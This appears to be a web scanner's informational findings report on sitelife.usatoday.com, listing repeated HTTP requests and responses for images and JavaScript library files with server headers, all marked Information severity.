GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 537 Content-Type: image/png Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "b813bff4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:52 GMT Connection: close .PNG . ...IHDR.............".N'... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 500 Content-Type: image/png Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "6cd8c3f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:53 GMT Connection: close .PNG . ...IHDR...E.........g...... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 638 Content-Type: image/png Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "1276c1f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:52 GMT Connection: close .PNG . ...IHDR...,................ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 440 Content-Type: image/png Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "209dc8f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:52 GMT Connection: close .PNG . ...IHDR..............L_.... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 587 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:19 GMT Accept-Ranges: bytes ETag: "62f23bf4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:42 GMT Connection: close GIF89a................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 607 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:19 GMT Accept-Ranges: bytes ETag: "89039f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:44 GMT Connection: close GIF89a.....Y...........kk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 229 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:19 GMT Accept-Ranges: bytes ETag: "d8a24cf4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:42 GMT Connection: close GIF89a................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 3951 Content-Type: image/gif Last-Modified: Thu, 04 Nov 2010 22:01:56 GMT Accept-Ranges: bytes ETag: "8687ae56b7ccb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:42 GMT Connection: close GIF89a................... ...,................=.... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 1849 Content-Type: image/gif Last-Modified: Thu, 04 Nov 2010 22:01:55 GMT Accept-Ranges: bytes ETag: "9fd4e3e46b7ccb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:44 GMT Connection: close GIF89a................... ...,..........w .. !...DB..A..H..... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 339 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT Accept-Ranges: bytes ETag: "b8e68df3917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:42 GMT Connection: close GIF89a................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 253 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "5eb1bcf4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:49 GMT Connection: close GIF89a................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 211 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "ccb29df4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:50 GMT Connection: close GIF89a.............cb]`_Z ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 391 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "aaecb7f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:51 GMT Connection: close GIF89a................ ..N.....,..f..u..Q.....p. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 106 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "508ab5f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:49 GMT Connection: close GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 137 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "f627b3f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:49 GMT Connection: close GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 345 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "aaecb7f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:49 GMT Connection: close GIF89a.............)>k=Z. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 173 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "aaecb7f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:49 GMT Connection: close GIF89a.............C~... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 172 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "aaecb7f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:49 GMT Connection: close GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 118 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "f627b3f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:50 GMT Connection: close GIF89a.............Cx.g.. |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 271 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "508ab5f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:50 GMT Connection: close GIF89a.............xxz... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 85 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "508ab5f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:50 GMT Connection: close GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 378 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "f627b3f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:50 GMT Connection: close GIF89a.................. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 606 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "f627b3f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:50 GMT Connection: close GIF89a................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 618 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "aaecb7f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:51 GMT Connection: close GIF89a................[.. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua |
GET /ver1.0/Content/ua Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 9330 Content-Type: application/x-javascript Last-Modified: Mon, 08 Nov 2010 16:08:56 GMT Accept-Ranges: bytes ETag: "0dca73e5f7fcb1:2af" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:33 GMT Connection: close /* CheckPlayer 1.0.2 <http://checkplayer Copyright (c) 2008 Kyle Simpson, Getify Solutions, Inc. This software is released under the MIT License <http://www.opensource ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua |
GET /ver1.0/Content/ua Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SiteLifeHost=gnvm6l3 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 13417 Content-Type: application/x-javascript Last-Modified: Mon, 08 Nov 2010 16:08:56 GMT Accept-Ranges: bytes ETag: "0dca73e5f7fcb1:2af" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:29 GMT Connection: close /* flXHR 1.0.3 <http://flxhr.flensed.com Copyright (c) 2008 Kyle Simpson, Getify Solutions, Inc. This software is released under the MIT License <http://www.opensource ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua |
GET /ver1.0/Content/ua Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 3823 Content-Type: application/x-javascript Last-Modified: Tue, 02 Nov 2010 13:29:19 GMT Accept-Ranges: bytes ETag: "8021d7f3917acb1:2af" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:34 GMT Connection: close /* flensedCore 1.0 <http://www.flensed.com/> Copyright (c) 2008 Kyle Simpson, Getify Solutions, Inc. This software is released under the MIT License <http://www.opensource ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua |
GET /ver1.0/Content/ua Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 3419 Content-Type: application/x-javascript Last-Modified: Mon, 08 Nov 2010 16:08:56 GMT Accept-Ranges: bytes ETag: "0dca73e5f7fcb1:2af" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:33 GMT Connection: close /* jQuery.flXHRproxy 1.2.1 <http://flxhr.flensed.com Copyright (c) 2009 Kyle Simpson This software is released under the MIT License <http://www.opensource Thi ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua |
GET /ver1.0/Content/ua Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 761 Content-Type: application/x-javascript Last-Modified: Tue, 02 Nov 2010 13:29:19 GMT Accept-Ranges: bytes ETag: "8021d7f3917acb1:2af" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:33 GMT Connection: close /** * jQuery.XHR * Copyright (c) 2008 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot * Dual licensed under MIT and GPL. * Date: 8/7/2008 * * @projectDescription Re ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua |
GET /ver1.0/Content/ua Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
